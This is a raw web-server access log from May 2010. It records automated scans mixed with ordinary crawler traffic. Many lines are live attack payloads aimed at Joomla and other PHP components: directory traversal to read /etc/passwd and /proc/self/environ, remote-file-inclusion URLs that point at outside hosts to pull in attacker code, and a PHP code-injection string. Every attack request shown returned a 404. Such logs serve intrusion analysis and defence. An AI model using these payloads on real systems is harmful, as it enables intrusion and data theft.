114.108.177.125 - - [28/May/2010:08:40:03 -0500] "GET /logs/access_log.1271548800/index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.108.177.125 - - [28/May/2010:08:40:03 -0500] "GET /logs/index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:08:41:11 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.236.43.200 - - [28/May/2010:08:41:15 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:08:42:32 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:08:42:32 -0500] "GET /logs/access_log.1271548800//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:08:42:33 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:08:42:36 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:08:42:36 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:08:42:36 -0500] "GET /logs/access_log.1271548800//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.146.255.196 - - [28/May/2010:08:42:55 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.146.255.196 - - [28/May/2010:08:42:55 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.146.255.196 - - [28/May/2010:08:42:56 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.195.112.180 - - [28/May/2010:08:43:12 -0500] "GET /logs/ HTTP/1.0" 200 7270 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.211.18.156 - - [28/May/2010:08:43:24 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
95.211.18.156 - - [28/May/2010:08:43:24 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
95.211.18.156 - - [28/May/2010:08:43:41 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.55.43.66 - - [28/May/2010:08:44:09 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.91.234.162 - - [28/May/2010:08:44:13 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:14 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:16 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:17 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:18 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:19 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:20 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:21 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:22 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:23 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:24 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:25 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:27 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:27 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:28 -0500] "GET /*.php?option=com_gcalendar&controller=../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:29 -0500] "GET /*.php?option=com_gcalendar&controller=../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:30 -0500] "GET /*.php?option=com_gcalendar&controller=../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:31 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
67.195.112.180 - - [28/May/2010:08:44:31 -0500] "GET /logs/?M=A HTTP/1.0" 200 7270 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.91.234.162 - - [28/May/2010:08:44:32 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:33 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:34 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:35 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:37 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:38 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:39 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:40 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:40 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:41 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:42 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:43 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:44 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:45 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:47 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:48 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:49 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:50 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:51 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:52 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:44:53 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
218.146.255.196 - - [28/May/2010:08:44:56 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [28/May/2010:08:45:01 -0500] "GET /logs/access_log.1274572800 HTTP/1.0" 200 835120 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [28/May/2010:08:48:53 -0500] "GET /logs/access_log.1275004800 HTTP/1.0" 200 437427 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
58.125.181.214 - - [28/May/2010:08:50:17 -0500] "GET /logs/access_log.1271548800//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.125.181.214 - - [28/May/2010:08:50:17 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.125.181.214 - - [28/May/2010:08:50:17 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.55.43.66 - - [28/May/2010:08:51:47 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.55.43.66 - - [28/May/2010:08:51:47 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.43.66 - - [28/May/2010:08:51:48 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
38.101.148.126 - - [28/May/2010:08:52:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
188.216.131.60 - - [28/May/2010:08:52:06 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0_20"
38.101.148.126 - - [28/May/2010:08:52:12 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
74.55.43.66 - - [28/May/2010:08:52:15 -0500] "GET /logs/access_log.1274227200//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
218.146.255.196 - - [28/May/2010:08:52:21 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
218.146.255.196 - - [28/May/2010:08:52:22 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.146.255.196 - - [28/May/2010:08:52:22 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
218.146.255.196 - - [28/May/2010:08:52:27 -0500] "GET /logs/access_log.1274227200//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
95.211.18.156 - - [28/May/2010:08:53:04 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
95.211.18.156 - - [28/May/2010:08:53:04 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
95.211.18.156 - - [28/May/2010:08:53:05 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.250.255.243 - - [28/May/2010:08:53:11 -0500] "GET /logs/access_log.1221004800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
95.211.18.156 - - [28/May/2010:08:53:27 -0500] "GET /logs/access_log.1274227200//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.195.112.180 - - [28/May/2010:08:53:40 -0500] "GET /logs/access_log.1273190400 HTTP/1.0" 200 467945 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.126.254.139 - - [28/May/2010:08:54:21 -0500] "GET //poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:54:21 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:54:21 -0500] "GET /logs/access_log.1271548800//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:54:21 -0500] "GET /logs/access_log.1271894400//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:54:32 -0500] "GET //poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:54:32 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:54:32 -0500] "GET /logs/access_log.1271548800//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:54:32 -0500] "GET /logs/access_log.1271894400//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
187.45.193.159 - - [28/May/2010:08:54:55 -0500] "GET //index2.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
209.126.254.139 - - [28/May/2010:08:55:08 -0500] "GET //poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:55:08 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:55:08 -0500] "GET /logs/access_log.1273363200%20%20//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:55:15 -0500] "GET //poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:55:15 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:55:15 -0500] "GET //poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:55:15 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:55:15 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:55:15 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:55:20 -0500] "GET //poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:55:20 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:55:20 -0500] "GET /logs/access_log.1273363200%20%20//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:57:32 -0500] "GET /logs/access_log.1223683200%20%20//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:57:40 -0500] "GET /logs/access_log.1223683200%20%20//poll/poll_ssi.php?include_path=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.46.13.93 - - [28/May/2010:08:57:58 -0500] "GET /logs/access_log.1196380800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.228.133.135 - - [28/May/2010:09:00:05 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
72.51.42.60 - - [28/May/2010:09:07:47 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:09:07:47 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
207.46.199.47 - - [28/May/2010:09:07:58 -0500] "GET /logs/access_log.1232496000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.197 - - [28/May/2010:09:07:59 -0500] "GET /logs/access_log.1240963200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.51.42.60 - - [28/May/2010:09:08:58 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:09:08:58 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
67.227.135.106 - - [28/May/2010:09:09:46 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fimaonline.org/id? HTTP/1.1" 404 339 "-""libwww-perl/5.831"
67.227.135.106 - - [28/May/2010:09:09:47 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fimaonline.org/id? HTTP/1.1" 404 334 "-""libwww-perl/5.831"
87.250.255.243 - - [28/May/2010:09:12:40 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.197 - - [28/May/2010:09:19:58 -0500] "GET /logs/access_log.1168905600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.127.70.140 - - [28/May/2010:09:20:29 -0500] "GET //poll/poll_ssi.php?include_path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:09:20:42 -0500] "GET //poll/poll_ssi.php?include_path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
80.179.153.117 - - [28/May/2010:09:22:16 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.com../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
80.179.153.117 - - [28/May/2010:09:22:17 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.com../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
80.179.153.117 - - [28/May/2010:09:22:17 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.com../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
69.163.151.185 - - [28/May/2010:09:22:25 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.net../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
